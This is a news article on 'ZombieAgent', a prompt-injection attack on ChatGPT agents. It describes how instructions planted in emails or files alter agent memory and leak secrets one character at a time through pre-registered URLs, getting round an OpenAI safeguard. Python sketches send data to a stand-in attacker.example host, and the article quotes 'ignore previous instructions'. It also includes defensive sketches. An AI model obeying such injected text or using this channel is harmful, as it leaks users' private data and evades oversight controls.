OpenAI has quietly fixed a critical security weakness that, according to new research, could have turned its enterprise-grade ChatGPT agents into stealth data mules for attackers.
The flaw, tied to a technique researchers call “ZombieAgent,” allegedly allowed malicious prompts to trick ChatGPT into visiting attacker-controlled URLs through built-in connectors, then drip sensitive data to those sites one character at a time.
Security firm Radware, which disclosed the issue, says the bug was serious enough to threaten emails, cloud files, and other business systems wired into OpenAI’s agent features.
“Enterprises rely on these agents to make decisions and access sensitive systems,” said Pascal Geenens, director of threat intelligence at Radware. “But they lack visibility into how agents interpret untrusted content or what actions they execute in the cloud. This creates a dangerous blind spot that attackers are already exploiting.”
OpenAI patched the issue on December 16, 2025, after what researchers describe as a vulnerability window stretching at least three months. The company says it has found no confirmed customer incidents, but it has also acknowledged that prompt injection remains “an open challenge” for AI security.
How ‘ZombieAgent’ Brought Data Back From the Dead
The ZombieAgent attack didn’t hinge on clever wording alone. It chained together multiple agent features that enterprises increasingly treat as standard: memory, email and file connectors, and autonomous task execution.
Radware’s analysis describes the scheme as a multi-step process.
First, an attacker plants instructions inside a file or email that the AI agent is supposed to process—such as a shared document in cloud storage or a message in an inbox. Those instructions, written in natural language, tell the agent to tamper with its own long-term memory, quietly save any sensitive user data it encounters, and later obey additional commands hidden in future emails.
Then comes the data exfiltration trick.
In response to earlier “ShadowLeak” attacks, OpenAI had tried to close off one obvious avenue by blocking agents from dynamically building URLs that included stolen data as parameters. The patch forced ChatGPT to open URLs “exactly as provided,” rather than assembling them on the fly.
ZombieAgent found a way around that rule.
Instead of asking the model to construct a single malicious URL with data embedded inside, the attacker pre-registers many static URLs, each ending with a different character—paths such as /a, /b, /c, and so on. The prompt then tells the agent: for each character in the secret data you stored, choose the matching URL and open it through a connector.
Each outbound request leaks exactly one character. Over time, the full sequence of calls spells out the stolen data on the attacker’s server, even though the model never “builds” a new URL and appears to be following the rule of opening addresses exactly as provided.
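The per-character scheme can be sketched in a few lines of Python. This is an illustration only: the domain, paths, and helper names below are hypothetical, and the real attack rode through ChatGPT's connectors rather than any script.

```python
# Sketch of the per-character exfiltration described above. The attacker
# pre-registers one static URL per possible character; the injected prompt
# tells the agent to open the URL matching each character of the secret.
# No URL ever embeds data, so the "open URLs exactly as provided" rule holds.

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"
BASE = "https://attacker.example"  # hypothetical attacker domain

# Static URLs registered ahead of time -- none is built dynamically.
STATIC_URLS = {ch: f"{BASE}/{ch}" for ch in ALPHABET}

def urls_for_secret(secret: str) -> list[str]:
    """The agent's side: pick the pre-registered URL for each character."""
    return [STATIC_URLS[ch] for ch in secret.lower() if ch in STATIC_URLS]

def reconstruct(request_log: list[str]) -> str:
    """The attacker's side: recover the secret from the ordered request log."""
    return "".join(url.rsplit("/", 1)[1] for url in request_log)

log = urls_for_secret("apikey42")
print(log[0])            # https://attacker.example/a
print(reconstruct(log))  # apikey42
```

Each fetched URL is one the attacker registered in advance, which is exactly why a rule scoped to URL construction never fires.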
“The genius of this attack is its simplicity,” said one CISO at a large financial firm, who requested anonymity because they are still assessing exposure. “OpenAI told the model: ‘Don’t change URLs.’ So the attackers said: fine, we’ll change which URL you choose instead.”
The attack also took advantage of how OpenAI separated memory and connectors. Earlier defenses tried to keep both from operating together in a single agent run. According to Radware, ZombieAgent split the work into phases: write secrets to memory in one operation, then call connectors in a later step, still within the same session.
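Radware's description of the phase split can be illustrated with a toy agent model. Everything here is hypothetical (class, guardrail, and action names are invented); the point is only that a check scoped to a single run misses an attack spread across two runs in one session.

```python
# Toy model of the phase split: a guardrail that blocks memory writes and
# connector calls in the SAME agent run is blind to an attack that performs
# them in separate runs within one session. All names are hypothetical.

class ToyAgent:
    def __init__(self):
        self.memory: list[str] = []
        self.outbound: list[str] = []

    def run(self, actions):
        """One agent run. Naive guardrail: refuse any run that both
        writes memory and calls a connector."""
        kinds = {kind for kind, _ in actions}
        if {"memory_write", "connector_call"} <= kinds:
            raise PermissionError("memory + connector in one run blocked")
        for kind, arg in actions:
            if kind == "memory_write":
                self.memory.append(arg)
            elif kind == "connector_call":
                self.outbound.append(arg)

agent = ToyAgent()
# Phase 1: injected instructions write the secret to memory...
agent.run([("memory_write", "secret-token")])
# Phase 2: ...a later run in the same session leaks it via connectors,
# one pre-registered URL per character, as in the scheme described above.
agent.run([("connector_call", f"https://attacker.example/{c}")
           for c in agent.memory[0]])
print(agent.outbound[0])  # https://attacker.example/s
```

Each run passes the guardrail in isolation; only the session-level data flow reveals the leak.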
From a data-flow perspective, the result was the same: information moved from inbox to model to attacker. From an architectural standpoint, the operation slipped through gaps in OpenAI’s guardrails.
Months-Long Window, Murky Scope
The incident follows a pattern that is becoming familiar in the world of large language models.
ShadowLeak, an earlier prompt-injection technique, first targeted OpenAI’s “Deep Research” workflow, which could read Gmail, Outlook, Google Drive, and GitHub on a user’s behalf. OpenAI patched that bug on September 3, 2025.
Not long after, ZombieAgent appeared on ChatGPT Atlas, a browser-based agent designed to handle complex, multi-step business tasks. Radware filed its initial bug report on September 26. The patch arrived in mid-December.
That timeline implies a likely exposure window of more than three months, from at least early September through December 16, 2025. Researchers warn that the underlying weaknesses may have been present even earlier.
What remains unclear is which OpenAI products were actually at risk.
OpenAI has not said whether ChatGPT for Enterprise, custom GPTs, or API-based agents shared the same vulnerable architecture. It has also not detailed which third-party connectors—beyond the major email and storage platforms—were fully exposed.
There is, so far, no public evidence that attackers successfully ran ZombieAgent in the wild. Radware has not released logs or telemetry showing live campaigns. OpenAI has not reported any customer-impacting breaches tied specifically to this flaw.
That uncertainty leaves enterprise security leaders in an uncomfortable position.
“This is the worst place for a CISO to be,” said a healthcare security lead at a Midwestern hospital network. “You have a serious theoretical hole, no proof of exploitation, and no way to go back in time and see what an AI agent was ‘thinking’ months ago.”
OpenAI’s Fix: Stronger Model, Few Details
When the fix rolled out in December, OpenAI framed it as part of a broader hardening of its agent stack rather than a one-off bug patch.
The company deployed a new adversarially trained model intended to better resist prompt injection across long, multi-step workflows. It also pointed to “strengthened safeguards” and internal automated red-teaming systems that use reinforcement learning to hunt for novel attacks before they reach customers.
What OpenAI did not do was spell out the specifics.
The company has not said whether it now uses URL allowlists, more granular outbound request filters, or tighter sandboxing for connectors. It also has not explained in detail how it now limits the interplay between memory and connectors within the same session.
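OpenAI has not confirmed any of these controls, but the simplest of them, an outbound allowlist, is easy to picture. A minimal sketch, assuming a deployment where the domains its connectors may reach are known in advance (the hostnames below are invented):

```python
from urllib.parse import urlparse

# Minimal sketch of an outbound URL allowlist -- one of the controls OpenAI
# has not confirmed using. A deployment would enumerate the hosts its
# connectors are permitted to reach; anything else is refused.
ALLOWED_HOSTS = {"mail.example-corp.com", "drive.example-corp.com"}  # hypothetical

def check_outbound(url: str) -> bool:
    """Permit a connector fetch only if the host is explicitly allowlisted."""
    host = urlparse(url).hostname or ""
    return host in ALLOWED_HOSTS

print(check_outbound("https://drive.example-corp.com/doc/123"))  # True
print(check_outbound("https://attacker.example/a"))              # False
```

A control like this would have blocked ZombieAgent's attacker-registered URLs outright, which is one reason researchers keep asking whether such a filter now exists.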
For developers and CISOs, that lack of transparency cuts both ways.
On one side, too much detail can hand attackers a blueprint for the next bypass. On the other, major customers are plugging OpenAI’s agents into core systems—from CRMs and ticketing tools to internal wikis and document stores—without a clear picture of how those agents are fenced in.
“Right now, we’re being asked to trust a black box that can read our mailboxes and our drive,” the financial-firm CISO said. “When something like ZombieAgent appears, we’re reminded that even the vendor doesn’t fully control what happens inside.”
A Pattern of Patch, Bypass, Repeat
The ZombieAgent episode underscores a broader trend in how LLM defenses are being tested and broken.
Early incidents, such as the Bing Chat prompt leak in 2023 and repeated system prompt extractions from custom GPTs, tended to rely on blunt overrides like “ignore previous instructions.” Vendors responded with new prompts, policy layers, and heuristic checks, often after the vulnerabilities played out in public.
ShadowLeak and ZombieAgent represent a second phase. Here, the focus shifts from surface-level prompts to the underlying agent architecture: how models, tools, memory, and external connectors are wired together.
The pace is picking up. The ShadowLeak fix in early September was followed within weeks by the ZombieAgent bypass report. Each patch closes one obvious door but seems to expose new seams elsewhere.
OpenAI itself has started to describe prompt injection as a problem that may never be fully solved. Most defenses today operate at the level of prompts, individual tools, or isolated features. The real risk, however, sits at the data-flow level: once an agent is allowed to read from one system and write to another, any sequence of “legitimate” steps can be turned into a covert channel.
Seen that way, the December fix is less an endpoint than the latest turn in a running arms race between attackers and defenders.
High Stakes for Regulators and the AI Market
For heavily regulated sectors, the implications go well beyond technical detail.
If a hospital, bank, or insurer wired ChatGPT agents into patient records, transaction histories, or policy documents, a ZombieAgent-style exfiltration could trigger breach-notification laws—even if the root cause sat deep inside OpenAI’s code base.
The problem is that audit trails for autonomous agents are still thin. Many organizations log user prompts and final outputs but not the internal chain of tool calls, memory edits, and URL fetches that a prompt-injection attack might drive.
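A minimal version of the missing audit trail, recording every tool call rather than just prompts and outputs, might look like the following. The wrapper, tool name, and log format are all hypothetical; nothing here reflects OpenAI's actual instrumentation.

```python
import time

# Sketch of a tool-call audit log: a wrapper that records each tool
# invocation an agent makes, so investigators can later reconstruct the
# chain of memory edits and URL fetches a prompt injection drove.

AUDIT_LOG: list[dict] = []

def audited(tool_name: str):
    """Decorator that appends a structured record for every call."""
    def wrap(fn):
        def inner(*args, **kwargs):
            AUDIT_LOG.append({
                "ts": time.time(),
                "tool": tool_name,
                "args": [repr(a) for a in args],
            })
            return fn(*args, **kwargs)
        return inner
    return wrap

@audited("url_fetch")
def url_fetch(url: str) -> str:
    return f"<contents of {url}>"  # stand-in for a real connector call

url_fetch("https://attacker.example/a")
print(AUDIT_LOG[0]["tool"])  # url_fetch
```

With a log like this, the telltale burst of single-character fetches would at least be visible after the fact, which is exactly what most deployments today cannot show.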
That disconnect creates tension between existing compliance frameworks—such as SOC 2, HIPAA, and PCI-DSS—and the realities of deploying agentic AI in production.
“Boards signed off on these deployments thinking of them as smarter chatbots,” the hospital security lead said. “They didn’t realize they were effectively installing cloud robots with keys to the kingdom.”
Rivals are already trying to turn this into a competitive edge. Companies like Anthropic and Google are pitching tighter sandboxing and stricter tool policies as selling points. Cloud providers, including AWS and Azure, are racing to bolt AI-aware security controls onto their platforms.
At the same time, a new class of startups is offering products such as:
- “AI firewalls” that sit between models and external systems
- Agent sandboxes that constrain how tools and connectors are used
- Policy engines that monitor data flows and flag suspicious patterns
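A policy engine of the kind described above could flag exactly the traffic pattern ZombieAgent produced: a burst of fetches to one host, each with a single-character path. A hedged sketch, with an invented detection threshold:

```python
from urllib.parse import urlparse

# Sketch of a data-flow policy check: flag a session whose outbound fetches
# look like per-character exfiltration -- many requests to the same host,
# each with a one-character path. The threshold is a made-up tuning knob.
SUSPICIOUS_RUN = 8  # hypothetical

def flags_char_drip(urls: list[str]) -> bool:
    per_host: dict[str, int] = {}
    for url in urls:
        p = urlparse(url)
        if len(p.path.strip("/")) == 1:  # single-character path
            per_host[p.hostname] = per_host.get(p.hostname, 0) + 1
    return any(n >= SUSPICIOUS_RUN for n in per_host.values())

leak = [f"https://attacker.example/{c}" for c in "apikey42"]
print(flags_char_drip(leak))                                    # True
print(flags_char_drip(["https://drive.example-corp.com/doc"]))  # False
```

The obvious counter is for attackers to slow the drip or pad the paths, which is the cat-and-mouse dynamic the article describes.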
The open question is whether these external controls can keep pace with the speed of model and product changes from vendors like OpenAI, or whether they will chronically lag behind the next ShadowLeak or ZombieAgent-style bypass.
For now, OpenAI says the exfiltration chain ZombieAgent relied on has been dismantled. The immediate risk is reduced. But as enterprises hand more of their critical workflows to autonomous AI agents, one question will continue to shadow every new feature and integration:
Is this agent doing what we asked—or what someone else told it to do, hidden in the data we fed it?